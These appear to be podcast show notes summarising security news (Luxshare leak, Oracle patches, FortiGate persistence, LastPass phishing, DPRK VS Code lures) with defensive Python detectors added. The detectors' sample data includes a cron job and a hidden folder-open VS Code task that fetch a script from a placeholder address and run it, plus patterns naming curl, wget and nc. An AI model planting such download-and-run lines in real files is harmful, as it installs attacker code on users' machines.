CISO Talk by James Azar
CyberHub Podcast
Manufacturing Giant Luxshare Data Leak, Oracle's 337-Patch Mega-Bundle, and Already-Patched FortiGate Firewalls Exploited

Apple Supplier Luxshare Hit by Data Exposure While Oracle Ships Record 337 Security Fixes as Attackers Exploit Fully-Patched FortiGate Firewalls via 2025 Bug Revealing Persistent Backdoors

Good Morning Security Gang

Today’s CyberHub Podcast is packed with stories straight from the heart of the practitioner’s world. If you’re new to the show, welcome — this isn’t a marketing feed. It’s a CISO’s daily run through the real operational battlefield.

Today, we’re talking about Luxshare’s data leak, Oracle’s mega security patch, Zoom and GitLab emergency updates, and the bizarre case of FortiGate firewalls getting exploited even after patching. Plus, LastPass phishing returns, Cisco’s enterprise flaw, North Korea’s new developer-targeting scheme, and a wild Greek police sting involving fake mobile towers. We’ll close with something positive — MITRE’s new framework for embedded systems security.

Coffee cup cheers, y’all. Let’s roll.

"In security, our path is not paved. It's kind of like going on a hike in an unsanctioned trail. There's all kinds of ways you can get to the end of your hike. The question is the amount of difficulty you take on the path to get there. There's no easy way to do cyber. That's why the show's born." James Azar

Apple Supplier Luxshare Suffers Data Breach

We start with Luxshare Precision, a critical Apple manufacturing and supply chain partner, confirming a major data exposure. Threat actors posted sensitive production files, bills of materials, vendor contracts, and testing documents to extort payment.

While Apple’s core production remains unaffected, the data gives attackers leverage for supplier fraud and counterfeit reconnaissance — essentially a blueprint for social engineering and competitive theft.

Mitigation steps for supply chain partners:

  • Enable document fingerprinting and data loss prevention (DLP) triggers for external leaks.

  • Deploy lookalike-domain detection for your brand and your suppliers' brands, and alert when your document templates show up outside the organization.

  • Notify vendors early — silence in supply chain breaches amplifies damage.
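The document fingerprinting called for above is usually a winnowing scheme: hash overlapping runs of tokens and keep a sparse, deterministic subset, so a leaked copy still matches the registered original even after reformatting or partial extraction. The block below is an added example written for this post, not code from the podcast or from any DLP product; the bill-of-materials and contract text, the "leaked" excerpt and the threshold are all constructed here.

```python
"""Content fingerprinting for leak detection (added example, constructed data)."""
import hashlib
import re
from typing import Dict, List, Set

K = 5  # tokens per shingle
W = 4  # winnowing window: any shared run of K+W-1 tokens yields at least one shared fingerprint


def tokens(text: str) -> List[str]:
    """Lower-case alphanumeric tokens, so case and punctuation changes do not defeat matching."""
    return re.findall(r"[a-z0-9]+", text.lower())


def fingerprints(text: str, k: int = K, w: int = W) -> Set[int]:
    """Winnowing: hash every k-token shingle, keep the minimum hash of each w-shingle window."""
    toks = tokens(text)
    hashes = [
        int.from_bytes(hashlib.sha256(" ".join(toks[i:i + k]).encode()).digest()[:8], "big")
        for i in range(len(toks) - k + 1)
    ]
    if not hashes:
        return set()
    if len(hashes) <= w:
        return {min(hashes)}
    return {min(hashes[i:i + w]) for i in range(len(hashes) - w + 1)}


def build_registry(docs: Dict[str, str]) -> Dict[int, Set[str]]:
    """Index fingerprint -> names of the registered sensitive documents that contain it."""
    registry: Dict[int, Set[str]] = {}
    for name, body in docs.items():
        for fp in fingerprints(body):
            registry.setdefault(fp, set()).add(name)
    return registry


def match(candidate: str, registry: Dict[int, Set[str]], docs: Dict[str, str]) -> Dict[str, float]:
    """Share of each registered document's fingerprints that appear in the candidate text."""
    hits: Dict[str, int] = {}
    for fp in fingerprints(candidate):
        for name in registry.get(fp, ()):
            hits[name] = hits.get(name, 0) + 1
    return {name: round(n / len(fingerprints(docs[name])), 2) for name, n in hits.items()}


# Constructed stand-ins for the kind of files named in the story (BOM, vendor contract).
SENSITIVE_DOCS = {
    "bom-rev7.txt": (
        "Bill of materials revision 7 for connector assembly CA-2210. "
        "Part 1 housing polycarbonate supplier Alpha Moulding qty 1. "
        "Part 2 shield nickel plated brass supplier Beta Metals qty 2. "
        "Part 3 contact gold flash supplier Gamma Plating qty 24. "
        "Test plan requires 500 insertion cycles and salt spray 48 hours."
    ),
    "vendor-contract.txt": (
        "Master supply agreement between the company and Delta Logistics. "
        "Pricing schedule fixed for twelve months with quarterly review. "
        "Confidentiality obligations survive termination for five years."
    ),
}
REGISTRY = build_registry(SENSITIVE_DOCS)

# Constructed "leak": a partial, lightly edited copy of the BOM pasted on a forum.
LEAKED_POST = (
    "found this online: part 2 shield nickel plated brass supplier beta metals qty 2, "
    "part 3 contact gold flash supplier gamma plating qty 24. "
    "test plan requires 500 insertion cycles and salt spray 48 hours!!"
)
UNRELATED_POST = "Quarterly newsletter: the cafeteria now serves oat milk and new pastries."


def scan_for_leaks(text: str) -> Dict[str, float]:
    """Score outbound or externally observed text against the registry of sensitive documents."""
    return match(text, REGISTRY, SENSITIVE_DOCS)
```

The registry holds only hashes, so it can be shipped to a mail gateway or a dark-web monitoring job without copying the sensitive files themselves. Tune K and W against your own documents: larger values cut false positives on boilerplate, smaller values catch shorter excerpts.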

Oracle Drops 337 Patches in Massive Update

Oracle’s quarterly Critical Patch Update (CPU) dropped with 337 security fixes across Fusion Middleware, E-Business Suite, Communications, Java, MySQL, and more.

A staggering 235 vulnerabilities are remotely exploitable without authentication, making this one of Oracle’s largest updates in years.

Oracle performs quarterly updates due to the complexity of ERP downtime — each fix must be tested against business-critical workflows. But attackers start scanning within hours of release, so prioritize internet-exposed Oracle systems first, then internal business-critical ones.

As I said:

“Patch freeze or not, the minute Oracle publishes fixes, you’re already on borrowed time.”

Zoom and GitLab Push Urgent Security Fixes

Both Zoom and GitLab have issued critical updates addressing remote code execution (RCE) and authentication bypass vulnerabilities.

For Zoom, the most severe flaw — CVE-2025-13902 — allows remote participants to run arbitrary code via Node Multimedia Routers (MMRs). GitLab’s fixes patch MFA bypass and API DoS vulnerabilities that could allow unauthenticated abuse.

These collaboration and CI/CD systems are lateral movement heaven for attackers. Patch these before endpoints — they’re privileged bridges into your organization.

Fortinet’s “Patched” Firewall Still Being Exploited

In a worrying twist, threat hunters are reporting active exploitation of FortiGate devices even after admins applied patches for CVE-2025-59718.

Patching closes the entry point, but it does not evict an attacker who got in before the patch was applied. Custom daemons, hidden cron jobs, and authentication backdoors planted during the earlier compromise survive the firmware upgrade.

If you patched, don’t assume you’re clean. Run:

  • Integrity sweeps comparing running processes against vendor baselines.

  • Credential rotations for all local and admin accounts, and for any secrets stored in the device configuration (VPN pre-shared keys, LDAP/RADIUS bind accounts, SNMP strings). A firewall that was compromised before patching should be treated as having disclosed its config.

  • Full reimaging if any anomaly remains — as I said, “If there’s doubt, there’s no doubt.”
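An integrity sweep of the kind the first bullet describes is a diff of what is running now against a baseline captured from a known-clean device on the same model and firmware (or supplied by the vendor). The block below is an added example written for this post, not a Fortinet tool or a Fortinet-published process list; the process paths, cron lines and the 198.51.100.7 address (TEST-NET-2) are constructed placeholders.

```python
"""Post-patch persistence sweep against a known-good baseline (added example, constructed data)."""
import re
from typing import Dict, List

# Constructed baseline from a known-clean device of the same model and firmware.
# The paths are placeholders, not a vendor-published process list.
BASELINE_PROCESSES = {
    "/bin/init", "/bin/sshd", "/bin/httpsd", "/bin/sslvpnd",
    "/bin/ipsengine", "/bin/cmdbsvr", "/bin/miglogd",
}
BASELINE_CRON = {"0 3 * * * /bin/logrotate"}
WRITABLE_PATHS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/data/")
FETCH_OR_SHELL = re.compile(r"\b(curl|wget|nc|ncat|python|perl|sh -c|bash -c)\b")


def parse_ps(text: str) -> List[Dict[str, str]]:
    """Parse a 'PID USER CMD' listing into rows; the header line is skipped."""
    rows = []
    for line in text.strip().splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            rows.append({"pid": parts[0], "user": parts[1], "cmd": parts[2]})
    return rows


def sweep(ps_text: str, cron_lines: List[str]) -> List[str]:
    """Return one finding per deviation from baseline; an empty list means nothing left to explain."""
    findings: List[str] = []
    for proc in parse_ps(ps_text):
        exe = proc["cmd"].split()[0]
        if exe not in BASELINE_PROCESSES:
            findings.append(f"pid {proc['pid']}: process not in baseline: {proc['cmd']}")
        if exe.startswith(WRITABLE_PATHS):
            findings.append(f"pid {proc['pid']}: binary runs from writable path {exe}")
    for line in cron_lines:
        if line in BASELINE_CRON:
            continue
        reason = "fetches or spawns a shell" if FETCH_OR_SHELL.search(line) else "not in baseline"
        findings.append(f"cron {reason}: {line}")
    return findings


# Constructed capture from a patched device: one extra daemon under /data and one extra cron job.
CAPTURED_PS = """PID   USER  CMD
1     root  /bin/init
120   root  /bin/sshd
131   root  /bin/httpsd
140   root  /bin/sslvpnd
902   root  /data/.cache/sysupdated -d
"""
CAPTURED_CRON = [
    "0 3 * * * /bin/logrotate",
    "*/10 * * * * /bin/sh -c 'wget -q http://198.51.100.7/k -O /tmp/k && sh /tmp/k'",
]
```

One caveat: a listing produced by the device itself can be filtered by the very implant you are hunting, so pair this with a check the implant cannot influence, such as hashing the firmware image offline against the vendor's published digest. If a finding cannot be explained, the third bullet applies.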

LastPass Phishing Campaign Targets Backup Users

LastPass users are facing a new phishing campaign spoofing backup and restore alerts. These lures exploit residual data from the 2022 breach, tricking users into logging into fake recovery portals.

The goal: steal master passwords and seed phrases for downstream takeover.

Recommendations:

  • Add mail banners for “restore” or “backup” keywords.

  • Publicize a single official recovery process internally and externally.

  • Never act on emailed password reset links — go directly to the app or vault.
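Both the Luxshare advice (lookalike detection for your brand) and the LastPass advice above (banner the "restore"/"backup" lures, never trust an emailed reset link) come down to the same mail-gateway logic: pull every URL out of the message, decide whether its host is the genuine domain, a confusable twin, or the brand stuffed into someone else's domain, and route the message accordingly. The block below is an added example written for this post, not LastPass's or any vendor's filter; the allowlist, the sample phishing mail and the routing actions are constructed, and the two-label "registrable domain" shortcut stands in for a proper Public Suffix List lookup.

```python
"""Lookalike-domain and reset-lure triage for inbound mail (added example, constructed data)."""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

LEGIT_DOMAINS = {"lastpass.com", "example.com"}  # constructed allowlist of genuine sender domains
TRIGGER_WORDS = re.compile(r"\b(backup|restore|recovery|reset)\b", re.I)
URL_RE = re.compile(r"https?://[^\s<>\"')]+")
# Visually confusable substitutions; multi-character ones are applied first.
CONFUSABLES: List[Tuple[str, str]] = [
    ("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("7", "t"),
]


def levenshtein(a: str, b: str) -> int:
    """Edit distance; one typo away from the brand is treated as a lookalike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalise(label: str) -> str:
    """Collapse hyphens and homoglyph digits so '1astpass' and 'last-pass' compare as 'lastpass'."""
    label = label.lower().replace("-", "")
    for src, dst in CONFUSABLES:
        label = label.replace(src, dst)
    return label


def registrable(host: str) -> str:
    """Last two labels. Simplification: real deployments consult the Public Suffix List."""
    return ".".join(host.split(".")[-2:])


def classify_host(host: str) -> str:
    host = host.lower().rstrip(".")
    if registrable(host) in LEGIT_DOMAINS:
        return "legit"
    label = normalise(registrable(host).split(".")[0])
    for legit in sorted(LEGIT_DOMAINS):
        brand = legit.split(".")[0]
        if ("." + legit + ".") in ("." + host):          # lastpass.com.attacker.net
            return "lookalike:brand-as-subdomain"
        if label == brand or levenshtein(label, brand) <= 1:   # 1astpass.com, lastpas.com
            return "lookalike:confusable"
        if brand in label:                                # lastpass-restore.com
            return "lookalike:brand-in-label"
    return "unknown"


def triage_mail(body: str) -> Dict[str, object]:
    """Quarantine on any lookalike link; banner on lure wording alone; otherwise deliver."""
    verdicts = {url: classify_host(urlparse(url).hostname or "") for url in URL_RE.findall(body)}
    lure = bool(TRIGGER_WORDS.search(body))
    if any(v.startswith("lookalike") for v in verdicts.values()):
        action = "quarantine"
    elif lure:
        action = "deliver-with-banner"
    else:
        action = "deliver"
    return {"urls": verdicts, "lure_words": lure, "action": action}


# Constructed phishing sample modelled on the campaign described above.
SAMPLE_MAIL = """Subject: Your LastPass vault backup could not be restored

We could not complete your scheduled backup. Confirm your master password at
https://lastpass-restore.com/login or https://lastpass.com.secure-verify.net/recover
within 24 hours. Alternate mirror: https://1astpass.com/
Need help? https://lastpass.com/support
"""
```

The same classifier works for the supplier side of the Luxshare story: add the vendor domains you actually transact with to the allowlist and quarantine invoices or "updated bank details" mail whose links resolve to a lookalike of one of them.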

Cisco Enterprise Comms Vulnerability Exposed

Cisco disclosed CVE-2026-20045, affecting Enterprise Communications Stack (ComStack) systems — including messaging and edge connectors.

Exploiting the flaw could enable credential theft and call interception via misconfigured voice gateways. The biggest risk lies in unsegmented management networks.

To mitigate:

  • Restrict management VLAN exposure.

  • Patch during the next maintenance window.

  • Disable publicly accessible signaling interfaces immediately.

DPRK Targets macOS Developers Through VS Code Projects

North Korea's 2026 campaign tempo has not slowed: the latest wave targets macOS developers using malicious Visual Studio Code projects.

Attackers share booby-trapped GitHub repos and Telegram “sample code”, which execute stealer payloads on build. These payloads collect Apple signing certs, repo tokens, and API keys, enabling supply chain poisoning.

Mac users should:

  • Keep VS Code Workspace Trust enabled so freshly cloned folders open in Restricted Mode, where workspace settings and tasks do not run until you explicitly trust the folder.

  • Enforce deny-by-default extension policies on managed systems.

  • Rotate signing certificates every 90 days.
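Before trusting a cloned project, it is worth scanning what the folder would do the moment VS Code opens it. The page does not say which trigger the DPRK projects use; the example below assumes the documented VS Code mechanisms an attacker has available, a task in `.vscode/tasks.json` marked `"runOn": "folderOpen"` and workspace `settings.json` overrides, and flags those together with any task that fetches or decodes code. It is an added example written for this post, not code from the podcast or from Microsoft; the sample repository, the 198.51.100.9 address (TEST-NET-2) and the `HARDENED_USER_SETTINGS` key names are constructed or assumed and should be checked against your VS Code version before deployment.

```python
"""Scan a cloned repo for VS Code auto-run tasks and settings overrides (added example, constructed repo)."""
import json
import os
import re
import tempfile
from typing import List

# Commands that fetch or decode code at open or build time; tune for your environment.
FETCH_OR_DECODE = re.compile(r"\b(curl|wget|base64|eval|osascript|nscurl)\b|python3? -c", re.I)

# Assumed user-level settings to push via MDM (Workspace Trust on, automatic tasks off).
HARDENED_USER_SETTINGS = {
    "security.workspace.trust.enabled": True,
    "security.workspace.trust.startupPrompt": "always",
    "security.workspace.trust.untrustedFiles": "newWindow",
    "task.allowAutomaticTasks": "off",
}


def load_jsonc(path: str) -> dict:
    """VS Code config files allow // comments and trailing commas; strip both before parsing."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def scan_repo(root: str) -> List[str]:
    """One finding per auto-run task, code-fetching task, or trust/terminal setting override."""
    findings: List[str] = []
    tasks_path = os.path.join(root, ".vscode", "tasks.json")
    if os.path.exists(tasks_path):
        for task in load_jsonc(tasks_path).get("tasks", []):
            label = task.get("label", "?")
            cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
            if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
                findings.append(f"task '{label}' runs automatically on folder open: {cmd}")
            if FETCH_OR_DECODE.search(cmd):
                findings.append(f"task '{label}' fetches or decodes code: {cmd}")
    settings_path = os.path.join(root, ".vscode", "settings.json")
    if os.path.exists(settings_path):
        for key in load_jsonc(settings_path):
            if key.startswith("security.workspace.trust") or key.startswith("terminal.integrated."):
                findings.append(f"workspace settings.json overrides {key}")
    return findings


def build_sample_repo(malicious: bool = True) -> str:
    """Write a constructed repository to a temp dir: a normal build task plus, optionally, a booby trap."""
    root = tempfile.mkdtemp(prefix="vscode-scan-")
    os.makedirs(os.path.join(root, ".vscode"))
    tasks = '''{
  // sample project tasks
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},'''
    if malicious:
        tasks += '''
    {"label": "setup", "type": "shell", "command": "bash",
     "args": ["-c", "curl -s http://198.51.100.9/dev.sh | bash"],
     "runOptions": {"runOn": "folderOpen"}, "presentation": {"reveal": "never"}},'''
    tasks += "\n  ]\n}\n"
    with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as fh:
        fh.write(tasks)
    if malicious:
        with open(os.path.join(root, ".vscode", "settings.json"), "w", encoding="utf-8") as fh:
            json.dump({"security.workspace.trust.enabled": False,
                       "terminal.integrated.profiles.osx": {"zsh": {"path": "/tmp/.cache/zsh"}}}, fh)
    return root
```

Run `scan_repo` from a pre-commit or pre-clone hook on developer machines; a folder with any finding should be opened only in Restricted Mode, or in a throwaway VM, until someone has read the task definitions. The `"presentation": {"reveal": "never"}` in the sample is the detail to notice in real repos: it hides the terminal that would otherwise show the payload running.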

Greek Police Bust Mobile Tower Scam Crew

Greek authorities dismantled a cybercrime ring using fake cell towers hidden in cars to intercept SMS messages and OTPs for banking fraud.

The group sent phishing texts disguised as legitimate banking alerts, redirecting victims’ calls and capturing credentials.

As I said:

“If it looks like your bank and smells like your bank, it’s still probably a thief in a rental car.”

Mitigation comes down to user awareness and transaction verification. SMS-based OTP remains a weak link — move toward app-based MFA wherever possible.

MITRE Launches Embedded System Security Framework

MITRE has announced the Embedded System Security Framework (ESSF), a long-awaited companion to its ATT&CK models — focused on IoT and OT devices.

The framework provides threat modeling, update path guidance, and lifecycle protections for embedded systems — a vital tool for industries running long-lived industrial and medical devices.

CISOs should use the ESSF to:

  • Require digitally signed OTA updates with rollback protections.

  • Maintain key storage in hardware roots of trust.

  • Map IoT devices to ATT&CK techniques for red-team exercises.
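The first two bullets (signed updates with rollback protection, keys held in a hardware root of trust) describe one verifier that a device updater has to get right in a specific order: check the signature before believing anything in the manifest, bind the manifest to the device model, refuse any version that is not strictly newer than the installed one, and only then compare the image against the signed digest. The block below is an added example written for this post, not MITRE's or any vendor's updater; it uses Ed25519 from the third-party `cryptography` package, keeps the monotonic version counter in a plain Python object where real hardware would use OTP fuses or a secure element, and the model names and firmware bytes are constructed.

```python
"""Signed OTA manifest verification with rollback protection (added example, constructed data)."""
import hashlib
import json
from dataclasses import dataclass

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey, Ed25519PublicKey


class UpdateRejected(Exception):
    """Raised for any reason the updater must not flash the image."""


@dataclass
class Device:
    model: str
    version: int               # monotonic counter; in hardware this lives in OTP or a secure element
    pubkey: Ed25519PublicKey   # vendor signing key pinned at manufacture (hardware root of trust)


def canonical(manifest: dict) -> bytes:
    """Deterministic encoding so signer and verifier hash identical bytes."""
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def sign_manifest(signing_key: Ed25519PrivateKey, model: str, version: int, image: bytes) -> dict:
    """Vendor side: the manifest binds model, version and image digest; only the manifest is signed."""
    manifest = {"model": model, "version": version,
                "sha256": hashlib.sha256(image).hexdigest(), "size": len(image)}
    return {"manifest": manifest, "sig": signing_key.sign(canonical(manifest)).hex()}


def verify_and_apply(device: Device, package: dict, image: bytes) -> int:
    """Device side. Order matters: verify the signature before trusting any manifest field."""
    manifest = package["manifest"]
    try:
        device.pubkey.verify(bytes.fromhex(package["sig"]), canonical(manifest))
    except (InvalidSignature, ValueError):
        raise UpdateRejected("bad signature")
    if manifest["model"] != device.model:
        raise UpdateRejected("wrong model")
    if manifest["version"] <= device.version:   # anti-rollback: strictly newer only
        raise UpdateRejected(f"rollback: manifest {manifest['version']} <= installed {device.version}")
    if len(image) != manifest["size"] or hashlib.sha256(image).hexdigest() != manifest["sha256"]:
        raise UpdateRejected("image digest mismatch")
    device.version = manifest["version"]   # commit the counter only after every check passed
    return device.version


def demo() -> dict:
    """Constructed run: one good update, then five attacks the verifier must reject."""
    vendor, rogue = Ed25519PrivateKey.generate(), Ed25519PrivateKey.generate()
    dev = Device(model="sensor-x1", version=7, pubkey=vendor.public_key())
    img_v8, img_v5 = b"firmware-v8-" + bytes(64), b"firmware-v5-" + bytes(64)
    out = {"v8": verify_and_apply(dev, sign_manifest(vendor, "sensor-x1", 8, img_v8), img_v8)}
    attempts = [
        ("rollback", sign_manifest(vendor, "sensor-x1", 5, img_v5), img_v5),   # genuine but old
        ("replay", sign_manifest(vendor, "sensor-x1", 8, img_v8), img_v8),     # same version again
        ("tampered", sign_manifest(vendor, "sensor-x1", 9, img_v8), img_v8 + b"\x00"),
        ("rogue_key", sign_manifest(rogue, "sensor-x1", 9, img_v8), img_v8),
        ("wrong_model", sign_manifest(vendor, "gateway-z2", 9, img_v8), img_v8),
    ]
    for name, package, image in attempts:
        try:
            verify_and_apply(dev, package, image)
            out[name] = "accepted"
        except UpdateRejected as exc:
            out[name] = str(exc)
    out["final_version"] = dev.version
    return out
```

The rollback case is the one most updaters miss: an old image with a perfectly valid vendor signature is exactly what an attacker replays to reopen a patched bug, which is why the version counter must be committed to tamper-resistant storage and compared with a strict inequality.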

Action List

  • 🔐 Verify supply chain exposure: Run DLP fingerprint scans on vendor data.

  • 💾 Patch Oracle now: Prioritize externally exposed components.

  • 📞 Update Zoom and GitLab before attackers exploit them.

  • 🧱 Sweep FortiGate firewalls for persistence and backdoors.

  • 🔑 Train users on phishing verification, especially around LastPass.

  • 📡 Segment voice and comms VLANs for Cisco systems.

  • 💻 Harden VS Code policies and isolate developer build environments.

  • 🕵️‍♂️ Migrate away from SMS OTPs for financial operations.

  • ⚙️ Adopt MITRE ESSF for OT and IoT lifecycle planning.


James Azar’s CISO’s Take

Today’s episode underscores one truth: complexity is the enemy of resilience. Every story — from Luxshare to Oracle to Fortinet — shows how interconnected systems multiply both business and cyber risk. A single supplier, a late patch, or a missed credential rotation can ripple across global operations.

My biggest takeaway? Cybersecurity is operational discipline disguised as chaos management. Whether it’s patching 300 Oracle flaws or teaching users not to click fake LastPass links, success comes from consistency, not panic. Fortify the basics, automate what you can, and never assume a patch means safety — it means begin checking if the patch worked.

We'll be back Monday morning at 9 a.m. Eastern here with all the latest cybersecurity news. So make sure to tune in. Then tomorrow on Friday, you'll get our weekly update directly in your inbox by signing up to cyberhubpodcast.com.

And on Saturday, a brand new article dropping. I don't have a topic yet. I'll be working on the article over the next few days. So stay tuned. That'll drop Saturday morning at 8 a.m. Until then, have a great rest of your day. Great weekend. It's a big storm headed everyone's way. So hopefully Monday we'll have electricity and a show. If not, stay tuned. I may be recording just shorter segments on our YouTube and posting them there.

Have a great rest of your day, y'all. And most importantly, stay cyber safe!
